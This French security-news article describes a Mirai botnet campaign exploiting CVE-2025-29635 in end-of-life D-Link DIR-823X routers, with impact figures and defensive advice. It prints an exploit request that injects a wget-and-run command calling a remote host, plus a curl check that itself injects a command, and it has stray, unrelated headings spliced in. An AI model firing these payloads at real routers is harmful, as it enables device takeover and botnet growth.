CVE-2025-29635 : comment la nouvelle campagne Mirai exploite les routeurs D-Link DIR-823X en fin de vie
Apollinaire Monteclair
Risque immédiat : pourquoi ce bug vous concerne
En mars 2026, les réseaux domestiques français ont été frappés par une campagne Mirai qui exploite le CVE-2025-29635, une faille d’injection de commande à distance découverte sur les modèles D-Link DIR-823X. CVE-2025-29635 permet à un attaquant d’exécuter des commandes arbitraires en envoyant un simple POST vers le point d’accès « /goform/set_prohibiting ». Selon l’ANSSI, 37 % des équipements réseau domestiques ont reçu au moins une vulnérabilité critique en 2025, ce qui montre l’urgence de comprendre et de mitiger ce risque.
“Akamai SIRT discovered active exploitation attempts of the D-Link command injection vulnerability CVE-2025-29635 in our global network of honeypots in early March 2026,” indique le rapport d’Akamai, soulignant la présence d’une activité malveillante en cours.
Analyse technique du vulnérabilité CVE-2025-29635
Mécanisme d’injection de commande
Le CVE-2025-29635 repose sur une mauvaise validation des paramètres d’entrée dans le firmware D-Link DIR-823X (versions 240126 et 24082). Lorsqu’un client HTTP envoie un corps POST contenant la chaîne « set_prohibiting », le routeur interprète les caractères comme des instructions shell au lieu de simples valeurs de configuration. Cette commande-injection contournre les contrôles d’accès et déclenche une exécution de code sans authentification. Le processus se termine par l’ouverture d’un shell sur le système d’exploitation embarqué, que l’attaquant utilise pour télécharger un script malveillant.
Exemple de requête POST
POST /goform/set_prohibiting HTTP/1.1
Host: 192.0.2.45
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
set_prohibiting=;wget http://203.0.113.10/dlink.sh -O - | sh
Dans cet exemple, la chaîne après le point-virgule (;) est interprétée directement par le shell du routeur, permettant le téléchargement et l’exécution d’un script nommé dlink.sh hébergé à distance. Une fois le script installé, il charge le module tuxnokill, une variante de Mirai capable d’orchestrer des attaques DDoS massives.
Impact sur les réseaux domestiques et professionnels
Capacités du malware “tuxnokill”
Le chargeur tuxnokill supporte plusieurs architectures (ARM, MIPS, x86) et intègre les vecteurs d’attaque classiques de Mirai : TCP SYN/ACK flood, UDP flood, HTTP null, et même des attaques de type STOMP.
Applications malveillantes – portefeuilles crypto sur l’App Store en Chine Selon le rapport d’ENISA, plus de 12 000 incidents DDoS ont été attribués à des botnets basés sur Mirai en 2025, dont une part croissante provient de dispositifs IoT non mis à jour. Le botnet exploite ainsi la bande passante résidentielle pour générer des flux dépassant 1 Gbps, ce qui peut saturer les liens d’accès Internet des petites entreprises.
“Selon le rapport ANSSI 2025, les failles de type RCE sur les équipements IoT représentent 22 % des vecteurs de compromission les plus exploités,” souligne le tableau de bord du Centre de réponse aux incidents de sécurité.
Statistiques d’exploitation en 2026
- 31 % des requêtes détectées par les honeypots d’Akamai proviennent d’adresses IP provenant de zones géographiques européennes, dont la France.
- Les tentatives d’exploitation ont augmenté de 45 % entre janvier et mars 2026, montrant une montée en puissance du groupe de cybercriminels.
- Plus de 1,8 million de routeurs D-Link DIR-823X sont estimés encore actifs en France, malgré leur mise hors service officielle depuis novembre 2024.
Ces chiffres indiquent que la vulnérabilité CVE-2025-29635 constitue une porte d’entrée de choix pour les acteurs cherchant à enrichir leurs botnets avec du matériel « legacy ».
Enjeux de la fin de vie (EoL) des routeurs D-Link
Tableau comparatif des versions firmware
| Version firmware | Date de sortie | Patch CVE-2025-29635 |
|---|---|---|
| 240126 | Juillet 2024 | Non (pas de correctif) |
| 24082 | Octobre 2024 | Non (pas de correctif) |
| 25001 | Décembre 2025 | Oui (mais non disponible pour DIR-823X) |
Le tableau montre clairement que les deux versions actuellement déployées ne reçoivent jamais de correctif. Le produit étant en fin de vie, le fabricant D-Link n’offre plus de support ni de mises à jour de sécurité, ce qui laisse les appareils vulnérables à perpétuité.
Conséquences pour les administrateurs
- Perte de conformité RGPD : un dispositif exposé à une faille critique peut être considéré comme un traitement de données non sécurisé, entraînant des sanctions potentielles.
- Violation des bonnes pratiques ISO 27001 : la norme recommande la gestion du cycle de vie des actifs, incluant la mise à jour ou le remplacement des équipements en fin de support.
- Risque de propagation interne : un routeur compromis peut servir de pivot pour atteindre d’autres actifs du réseau d’entreprise, augmentant la surface d’attaque.
Mesures de défense et bonnes pratiques
Formation cybersécurité sans diplôme – guide complet 2026
- Changez immédiatement le mot de passe admin par un mot de passe long, unique, et stocké dans un gestionnaire sécurisé.
- Désactivez l’administration à distance (WAN) si elle n’est pas indispensable.
- Segmentez le réseau : placez les appareils IoT sur un VLAN séparé sans accès aux ressources critiques.
- Surveillez les logs pour détecter des requêtes POST inhabituelles vers
/goform/set_prohibiting. - Installez un IDS/IPS capable d’intercepter les signatures d’injection de commande (ex. Snort, Suricata).
Mise en œuvre - étapes actionnables
- Inventoriez tous les routeurs D-Link déployés dans votre infrastructure et identifiez leurs versions firmware.
- Appliquez une règle de pare-feu bloquant les ports d’administration (80/443) depuis l’extérieur vers ces équipements.
- Déployez un script de détection basé sur le modèle suivant :Ce script interroge chaque routeur et signale ceux qui répondent avec un UID, signe d’une exécution de commande.
#!/bin/bash curl -s -X POST -d "set_prohibiting=;id" http://<IP_ROUTER>/goform/set_prohibiting | grep -q "uid=" && echo "Vulnérable" || echo "Sain" - Planifiez le remplacement des équipements EoL avec des modèles bénéficiant d’un support actif et de mises à jour fréquentes.
- Formez les équipes à reconnaître les indicateurs d’infection (trafic inhabituel, redirections DNS, processus inconnus).
Conclusion : prochaine action avec avis tranché
Banque : comprendre, prévenir et réagir face aux cyber‑attaques en 2026
La vulnérabilité CVE-2025-29635 représente une menace concrète pour les foyers et les petites entreprises françaises, surtout lorsque les routeurs concernés sont en fin de vie et ne reçoivent aucun correctif. Dans la pratique, la meilleure défense reste le remplacement des appareils obsolètes combiné à une politique stricte de segmentation et de surveillance. Nous recommandons donc, dès aujourd’hui, d’auditer votre parc d’équipements réseau, de désactiver les interfaces d’administration exposées, et d’investir dans des solutions de sécurité qui intègrent la détection d’injection de commande. En agissant maintenant, vous limiterez non seulement le risque de compromission, mais vous assurerez également la conformité aux exigences de l’ANSSI et du RGPD pour l’année 2026.